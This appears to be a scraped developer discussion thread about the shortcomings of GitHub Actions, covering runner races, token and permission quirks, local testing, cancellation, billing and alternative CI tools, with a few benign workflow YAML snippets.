The entire codebase is a wonderful mess. When we early-adopted ephemeral runners, we found that the control flow is full of races and that the status code you get at the end is indicative of exactly nothing. So even if the backend is just having a hiccup picking up a job with an obscure Azure error code, you'd better throw that entire VM away, because you can't know whether that runner will ever recover or has already done things that would break the next run.
Although I never saw a public announcement of a discontinuation, ADO is kind of abandoned AFAICT, and even its landing page hints that you should use GitHub Enterprise instead [1].
[1] https://azure.microsoft.com/en-us/products/devops
It turns out the last person to change the cron __schedule__ (not the workflow file in general) becomes the 'actor' associated with that workflow. A very, very confusing implementation. The error messages are even more confusing: workflow runs are renamed to "{Unknown event}" and the message is "Email is unverified".
Link to docs: https://docs.github.com/en/actions/writing-workflows/choosin...
IIRC, GitHub recommends this practice in their docs, with a username of "YOUR_USERNAME-machine".
The machine user is just an ordinary GitHub user, added as a member of the organization, with all the necessary repo permissions, and a generated access token added to the GH repo Secrets. The organization owner then manages this GH machine account as well as the org, and their own personal (or work) login account.
We have not hit any rate limiting so far, but we're a relatively small team -- a dozen devs, a few hundred commits per day that trigger CI (we don't do CD), across half a dozen active repos.
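For what it's worth, wiring the machine account into a workflow is mostly a matter of using its token instead of the default one. A sketch, assuming the PAT is stored in a repo secret named `MACHINE_USER_TOKEN` (the secret name is my own, not from the comment above):

```yaml
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      # Check out with the machine user's PAT instead of the
      # default GITHUB_TOKEN, so commits/tags pushed by this job
      # are attributed to the machine account and can trigger
      # other workflows.
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.MACHINE_USER_TOKEN }}
      - run: ./scripts/release.sh  # hypothetical script path
```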
Maybe it was just the pain of switching but that was my initial impression.
I pair it with bash scripts for anything that's important to be able to run outside GitHub, which facilitates testing and maintenance.
Although I still need to run things multiple times and iterate against actual GitHub Actions runs, which is slow, I find it's the best way to catch issues. If the dev feedback loop were fixed it would save me a lot of precious time. I know there's a third-party tool to run workflows locally, but it's not the same…
Still, bash scripting is great for its portability.
I take this a step further and approach CI with the mentality that I should be able to run all of my CI jobs locally with a decent interface (i.e. not by running 10 steps in a row), and then I use CI to automate my workflow (or scale it, as the case may be). But it always starts with being able to run a given task locally and then building CI on top of it, not building it in CI in the first place.
Nothing beats having a single script to bootstrap and run the whole pipeline e.g. `make ci`.
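The resulting workflow file then shrinks to almost nothing — a sketch of the idea (the `make ci` target itself is whatever your Makefile defines):

```yaml
name: ci
on: [push]

jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # All real logic lives in the Makefile, so the exact same
      # entry point runs on a developer laptop and in CI.
      - run: make ci
```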
This means that for anything that needs to gracefully cancel, like for example terraform, it's screwed.
Want to cancel a run? Maybe you've got a plan being generated for every commit on a branch, but you push an update. Should be ok for GitHub to stop the previous run and run the action for the updated code, right? WRONG! That's a quick way to a broken state.
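One mitigation, assuming the default cancel-on-new-push behavior is what bites you: use a `concurrency` group that queues new runs instead of killing the in-flight one. A sketch:

```yaml
concurrency:
  # One run per branch. With cancel-in-progress: false, a new
  # push waits behind the running job instead of killing a
  # terraform apply halfway through.
  group: terraform-${{ github.ref }}
  cancel-in-progress: false
```

This trades latency for safety; it doesn't help if someone cancels the run manually from the UI.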
This is so frustrating. Having to inject a PAT into the workflow just so it will kick off another workflow is not only annoying, it just feels wrong. Also, now lots of operations are tied to my user, which I don't like.
> It doesn't help that you can't really try any of this locally (I know of [act](https://github.com/nektos/act) but it only supports a small subset of the things you're trying to do in CI).
This is the biggest issue with GH Actions (and most CIs): testing your flows locally is hard if not impossible.
All that said I think I prefer GH Actions over everything else I've used (Jenkins and GitLab), it just still has major shortcomings.
I highly recommend you use custom runners. The speed increase and cost savings are significant. I use WarpBuild [0] and have been very happy with them. I always look at alternatives when they are mentioned but I don't think I've found another service that provides macOS runners.
[0] https://www.warpbuild.com
[0] https://depot.dev/docs/github-actions/runner-types
We have a very complicated build process in my current project, but our CI pipelines are actually just a couple of hundred lines of GHA YAML, most of which is boilerplate or doing things like posting PR comments. The actual logic is in the NX configuration.
Outside of locking down edit access to the .github workflow yml files I'm not sure how vulnerabilities like this can be prevented.
Presumably anything configured via a .github workflow wouldn't assure safety, as those files can be edited to trigger unexpected actions like deploys on working branches. Our Github Action workflow yml file had a check to only deploy for changes to the main branch. The deploy got triggered because that check got removed from the workflow file in a commit on a working branch.
You create an environment, restrict it to the main branch, add your secret to it and then tie your deploy workflow to it.
If someone runs that workflow against another branch it will run but it won’t be able to access those secrets.
[0] https://docs.github.com/en/actions/managing-workflow-runs-an...
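A sketch of that setup — the branch restriction itself lives in the repo's environment settings, so the workflow side is just a reference (secret name is illustrative):

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    # "production" is configured in Settings > Environments to
    # only allow deployments from main; its secrets are not
    # exposed to runs against other branches.
    environment: production
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/deploy.sh  # hypothetical script path
        env:
          DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
```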
But for actually good security CI and CD should be different tools.
The problem is it's still possible to work around those controls unless you create some YAML monstrosity that stops people from making the mistake in the first place.
- Self-hosting on your aws/gcp/azure account can get a little tricky. `actions-runner-controller` is nice but runs your workflows within a docker container in k8s, which leads to complex handling for isolation, cost controls because of NAT etc.
- Multi-arch container builds require emulation and can be extremely slow by default.
- The cache limits are absurd.
- The macos runners are slow and overpriced (arguably, most of their runners are).
Over the last year, we spent a good amount of time solving many of these issues with WarpBuild[1]. Having unlimited cache sizes, remote multi-arch docker builders with automatic caching, and ability to self-host runners in your aws/gcp/azure account are valuable to minimize cost and optimize performance.
[1] https://warpbuild.com
[1] https://github.com/earthly/earthly/commit/6d7f6786ad9fa4392f... [2] https://github.com/earthly/earthly/commit/89d31fc014a8980a50...
I am really really hoping that someone (not me, I've already tried and failed) could slim it down into a single-purpose, self-contained, community maintainable tool ...
What a cool looking website. What kind of tool do you need to create those animations?
[1]https://github.com/nektos/act
https://github.com/StefMa/pkl-gha
It could save you already some time.
https://jibril.sh
Go look at your workflows and see how much of the runtime is spent running installers upon installers for various languages, package managers and so on. Containers were not supposed to be like this.
See: https://packetlost.dev/Why%20Does%20CI%20Suck
Why not align these tools? Then there might be less pain. What a good idea.
Eventually we tried dropping that requirement and instead relied on testing main before deploying to production. It sped us up again, and main never broke because of bad merges while I was there.
Like others have suggested, keep the actions simple by having lots of scripts which you can iterate on locally, and make the actions dumb: they just run the scripts.
None of it usefully explains how GHA works from the ground up, in a way that would help me solve problems I encounter.
We moved to dagger to get replicable local pipeline runs, escape the gitlab DSL, and get the enormous benefits of caching.
We have explicitly chosen to avoid using the "daggerverse", and with that the cross-language stuff. Reason being that it makes modifying our pipeline slower and harder -- the opposite of the reason we moved to dagger.
So we use the Dagger python API to define and run our CI builds. It's great!
Like the other comments on this page about dagger, the move to "integrate AI" is highly concerning. I am hopeful that they won't continue down this path, but clearly the AI hype bubble is strong and at least some of the dagger team are inside it.
I'm speculating that if the dagger team doesn't drop the AI stuff, then the dagger project will end. A fork will pop-up and we'll move to using that. Not an expert (yet!) in the buildkit API, but it seems like the stuff we're benefiting from with dagger is really just a thin wrapper around buildkit. So potentially not too challenging to create a drop-in replacement if necessary later.
But, there are so many red flags in this post. Clearly this corp does not know how to build, test and release professional software.
I hope Actions stays bad tho. We need more folks to get off proprietary code forges for their open source projects—& a better CI + a better review model (PRs are awful) are 2 very low-hanging fruit that would entice folks off of the platform not for the philosophical reasons such as not supporting US corporations or endangering contributor privacy by making them agree to Microsoft’s ToS, but for technical superiority on the platform itself.
you just activate some probes and write SQL queries to sift through the information.
But two major pains I did not see : the atrocious UI and the pricing.
Their pricing model goes against any good practice, as it bills a full minute for any job even if it runs for 2 seconds. Say you run 100 jobs in parallel and they all take 30 seconds: you will pay for 100 minutes instead of 50. Now translate this to an enterprise operating at scale, and I assure you, you'll see crazy differences between actual time and billable time.
Most of the time, I'm just running dotnet build to a zip file and s3 bucket. Then, some code or script picks it up on the other side. Things get much trickier when you're using multiple services, languages, runtimes, database technologies, etc.
https://github.com/rails/rails/pull/54693
There are better solutions out there.
I was doing things more than 20 years ago in Hudson that GHA can't do now.
A 1000% yes, because it means the default experience most devs have of CI is using ephemeral runners, which is a massive win for security and against build rot.
Every company I've worked at with stateful runners was a security incident begging to happen, not to mention builds that would do different things depending on what runner host you got placed on (devs manually installing different versions of things on hosts, etc)
And what are those?
And a lot more flexibility in terms of what you can do.
There's also the Woodpecker CI fork, which has a very similar user experience: https://woodpecker-ci.org/
When combined with Docker images, it's quite pleasant to use - you define what environment you want for the CI/CD steps, what configuration/secrets you need and define the steps (which can also just be a collection of scripts that you can run locally if need be), that's it.
Standalone, so you can integrate it with Gogs, Gitea or similar solutions for source control and perhaps a bit simpler than GitLab CI (which I also think is lovely, though maintaining on-prem GitLab isn't quite a nice experience all the time, not that you have to do that).
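A rough sketch of what a Woodpecker pipeline file looks like (images, script paths, and the secret name are placeholders; older versions use `pipeline:` instead of `steps:`):

```yaml
# .woodpecker.yml — each step runs inside the Docker image you
# pick, and the commands are plain shell you can also run locally.
steps:
  test:
    image: golang:1.22
    commands:
      - ./scripts/test.sh
  build:
    image: golang:1.22
    commands:
      - ./scripts/build.sh
    secrets: [registry_password]
```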
Couldn't we say that about most software? I do not think GitHub Actions ranks near the bottom in terms of documentation and user experience overall. I do understand your point, though.